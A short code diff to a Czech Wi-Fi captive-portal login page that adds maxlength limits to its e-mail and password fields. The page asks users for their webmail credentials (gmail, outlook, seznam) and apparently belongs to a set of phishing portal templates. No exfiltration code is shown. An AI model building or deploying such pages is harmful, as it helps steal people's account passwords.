--- a/portals/isp/cd_wifi.html
+++ b/portals/isp/cd_wifi.html
@@ -98,9 +98,9 @@
       <div id="error-msg" class="error-alert">Špatný e-mail nebo heslo</div>
       <form id="login-form">
         <label>E-MAIL</label>
-        <input id="email" type="email" name="email" placeholder="@ (např. gmail, outlook, seznam)" required>
+        <input id="email" type="email" name="email" placeholder="@ (např. gmail, outlook, seznam)" maxlength="100" required>
         <label>HESLO</label>
-        <input id="password" type="password" name="password" required>
+        <input id="password" type="password" name="password" maxlength="100" required>
         <button type="submit" class="btn">Přihlásit</button>
         <div class="checkbox-container">
           <label class="custom-checkbox">
